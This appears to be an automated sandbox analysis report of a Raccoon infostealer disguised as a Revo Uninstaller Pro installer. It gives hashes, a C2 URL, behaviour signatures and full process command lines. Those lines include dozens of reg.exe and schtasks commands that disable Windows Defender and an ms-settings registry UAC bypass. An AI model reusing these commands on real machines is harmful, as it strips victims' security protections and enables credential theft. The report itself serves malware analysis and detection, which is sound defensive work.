raccoon | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b

Analysis

max time kernel
139s
max time network
183s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
11-05-2022 23:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
Size

21.1MB
MD5

d8d732922c11a5f9ae7abf4580ce58af
SHA1

55f3b06b60c561a928d956bea991a4409eb50d8e
SHA256

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b
SHA512

2a58bef05f60c2cfc240be229a3b4abe8a1d01c3fa8361ca9ab9a58c343632efa44eccb8f9bd7657976e3d891bd52ad9f6972bd5e21897f8e153c9b3522d9e0e

Score

10^/10

raccoon c763e433ef51ff4b6c545800e4ba3b3b1a2ea077 evasion stealer trojan

Malware Config

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes

url4cnc
https://telete.in/jbitchsucks

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2140-221-0x0000000000900000-0x0000000000993000-memory.dmp	family_raccoon
behavioral2/memory/2140-224-0x0000000000900000-0x0000000000993000-memory.dmp	family_raccoon
behavioral2/memory/2140-227-0x0000000000900000-0x0000000000993000-memory.dmp	family_raccoon

Executes dropped EXE 9 IoCs

Processes:

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpRevo Uninstaller Pro 4.2.3.exeRevo Uninstaller Pro 4.2.3.tmp7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exeiMtu_gQB.exe

pid	process
2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
2952	Revo Uninstaller Pro 4.2.3.exe
1516	Revo Uninstaller Pro 4.2.3.tmp
628	7z.exe
1848	7z.exe
4028	7z.exe
356	7z.exe
1668	iMtu_gQB.exe
2140	iMtu_gQB.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 6 IoCs

Processes:

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exe

pid process

2044 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
628 7z.exe
1848 7z.exe
4028 7z.exe
356 7z.exe
1668 iMtu_gQB.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

iMtu_gQB.exe

description pid process target process

PID 1668 set thread context of 2140 1668 iMtu_gQB.exe iMtu_gQB.exe

description	pid	process	target process
PID 1668 set thread context of 2140	1668	iMtu_gQB.exe	iMtu_gQB.exe

Drops file in Program Files directory 2 IoCs

Processes:

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
File created	C:\Program Files (x86)\is-JB72V.tmp	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4772 2140 WerFault.exe iMtu_gQB.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3892 timeout.exe

pid	pid_target	process	target process
4772	2140	WerFault.exe	iMtu_gQB.exe

pid	process
3892	timeout.exe

Modifies registry class 8 IoCs

Processes:

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpreg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpiMtu_gQB.exe

pid	process
2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
1668	iMtu_gQB.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exe

description	pid	process
Token: SeRestorePrivilege	628	7z.exe
Token: 35	628	7z.exe
Token: SeSecurityPrivilege	628	7z.exe
Token: SeSecurityPrivilege	628	7z.exe
Token: SeRestorePrivilege	1848	7z.exe
Token: 35	1848	7z.exe
Token: SeSecurityPrivilege	1848	7z.exe
Token: SeSecurityPrivilege	1848	7z.exe
Token: SeRestorePrivilege	4028	7z.exe
Token: 35	4028	7z.exe
Token: SeSecurityPrivilege	4028	7z.exe
Token: SeSecurityPrivilege	4028	7z.exe
Token: SeRestorePrivilege	356	7z.exe
Token: 35	356	7z.exe
Token: SeSecurityPrivilege	356	7z.exe
Token: SeSecurityPrivilege	356	7z.exe
Token: SeDebugPrivilege	1668	iMtu_gQB.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp

pid process

2044 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpRevo Uninstaller Pro 4.2.3.exeWScript.execmd.execmd.exe

description	pid	process	target process
PID 2552 wrote to memory of 2044	2552	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
PID 2552 wrote to memory of 2044	2552	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
PID 2552 wrote to memory of 2044	2552	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
PID 2044 wrote to memory of 2952	2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp	Revo Uninstaller Pro 4.2.3.exe
PID 2044 wrote to memory of 2952	2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp	Revo Uninstaller Pro 4.2.3.exe
PID 2044 wrote to memory of 2952	2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp	Revo Uninstaller Pro 4.2.3.exe
PID 2952 wrote to memory of 1516	2952	Revo Uninstaller Pro 4.2.3.exe	Revo Uninstaller Pro 4.2.3.tmp
PID 2952 wrote to memory of 1516	2952	Revo Uninstaller Pro 4.2.3.exe	Revo Uninstaller Pro 4.2.3.tmp
PID 2952 wrote to memory of 1516	2952	Revo Uninstaller Pro 4.2.3.exe	Revo Uninstaller Pro 4.2.3.tmp
PID 2044 wrote to memory of 4580	2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp	WScript.exe
PID 2044 wrote to memory of 4580	2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp	WScript.exe
PID 2044 wrote to memory of 4580	2044	16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp	WScript.exe
PID 4580 wrote to memory of 2088	4580	WScript.exe	cmd.exe
PID 4580 wrote to memory of 2088	4580	WScript.exe	cmd.exe
PID 4580 wrote to memory of 2088	4580	WScript.exe	cmd.exe
PID 4580 wrote to memory of 2032	4580	WScript.exe	cmd.exe
PID 4580 wrote to memory of 2032	4580	WScript.exe	cmd.exe
PID 4580 wrote to memory of 2032	4580	WScript.exe	cmd.exe
PID 2088 wrote to memory of 4320	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4320	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4320	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1440	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1440	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1440	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1236	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1236	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1236	2088	cmd.exe	reg.exe
PID 2032 wrote to memory of 4648	2032	cmd.exe	reg.exe
PID 2032 wrote to memory of 4648	2032	cmd.exe	reg.exe
PID 2032 wrote to memory of 4648	2032	cmd.exe	reg.exe
PID 2032 wrote to memory of 64	2032	cmd.exe	reg.exe
PID 2088 wrote to memory of 4952	2088	cmd.exe	reg.exe
PID 2032 wrote to memory of 64	2032	cmd.exe	reg.exe
PID 2032 wrote to memory of 64	2032	cmd.exe	reg.exe
PID 2088 wrote to memory of 4952	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4952	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4624	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4624	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4624	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2340	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2340	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2340	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2960	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2960	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2960	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2540	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2540	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 2540	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4764	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4764	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4764	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1136	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1136	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1136	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4048	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4048	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4048	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 5008	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 5008	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 5008	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1676	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1676	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 1676	2088	cmd.exe	reg.exe
PID 2088 wrote to memory of 4392	2088	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
"C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2552

C:\Users\Admin\AppData\Local\Temp\is-88NUQ.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-88NUQ.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp" /SL5="$7004E,21430934,788992,C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2044

C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2952

C:\Users\Admin\AppData\Local\Temp\is-QBI7H.tmp\Revo Uninstaller Pro 4.2.3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QBI7H.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$101FA,16350626,188928,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
4⤵
- Executes dropped EXE
PID:1516

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\WsrD\MMF.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\WsrD\DisableOAVProtection.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2088

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:4320

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:1236

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:4952

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:4624

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
5⤵
PID:1440

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:2960

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:4764

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:1136

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:4048

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:5008

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
5⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:4392

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:3664

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:3884

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:3176

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:3812

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:3820

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:3208

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
5⤵
PID:4024

C:\Windows\SysWOW64\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
5⤵
PID:5044

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
5⤵
PID:1748

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2684

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:5116

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1244

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1680

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4616

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4492

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
- Modifies security service
PID:3496

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\WsrD\DisableUserAccountControl.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
5⤵
- Modifies registry class
PID:4648

C:\Windows\SysWOW64\reg.exe
REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
5⤵
- Modifies registry class
PID:64

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\WsrD\main.bat" "
4⤵
PID:1488

C:\Windows\SysWOW64\mode.com
mode 65,10
5⤵
PID:2748

C:\ProgramData\WsrD\7z.exe
7z.exe e file.zip -p___________26672pwd30077pwd1546___________ -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\ProgramData\WsrD\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\ProgramData\WsrD\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\ProgramData\WsrD\iMtu_gQB.exe
"iMtu_gQB.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\ProgramData\WsrD\iMtu_gQB.exe
"iMtu_gQB.exe"
6⤵
- Executes dropped EXE
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 488
7⤵
- Program crash
PID:4772

C:\ProgramData\WsrD\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\WsrD\DiskRemoval.bat" "
4⤵
PID:3404

C:\Windows\SysWOW64\timeout.exe
timeout /T 60 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2140 -ip 2140
1⤵
PID:4408

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
Filesize
16.1MB

MD5
1540ebe79933021c71b37d11ca590c6e

SHA1
5c3f54e29894d5d973e5a06d9b9cf53f723bcacf

SHA256
4c4258c10a1e7a0e7ab5529e68467cf23f5835621cff6dae204da456858d622a

SHA512
43ffc343ac95b52d62f2e918e8c5d7a65fd59a5f165643dbfadc4610b50d1460bdf561ab6ac0c02aa587abc0992acbaa2af6ef73f1b2ac75371d6d30292bb2d5

Download Submit
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
Filesize
16.1MB

MD5
1540ebe79933021c71b37d11ca590c6e

SHA1
5c3f54e29894d5d973e5a06d9b9cf53f723bcacf

SHA256
4c4258c10a1e7a0e7ab5529e68467cf23f5835621cff6dae204da456858d622a

SHA512
43ffc343ac95b52d62f2e918e8c5d7a65fd59a5f165643dbfadc4610b50d1460bdf561ab6ac0c02aa587abc0992acbaa2af6ef73f1b2ac75371d6d30292bb2d5

Download Submit
C:\ProgramData\WsrD\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\WsrD\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\WsrD\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\WsrD\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\WsrD\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\WsrD\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\WsrD\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\WsrD\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\WsrD\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\WsrD\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\WsrD\DisableOAVProtection.bat
Filesize
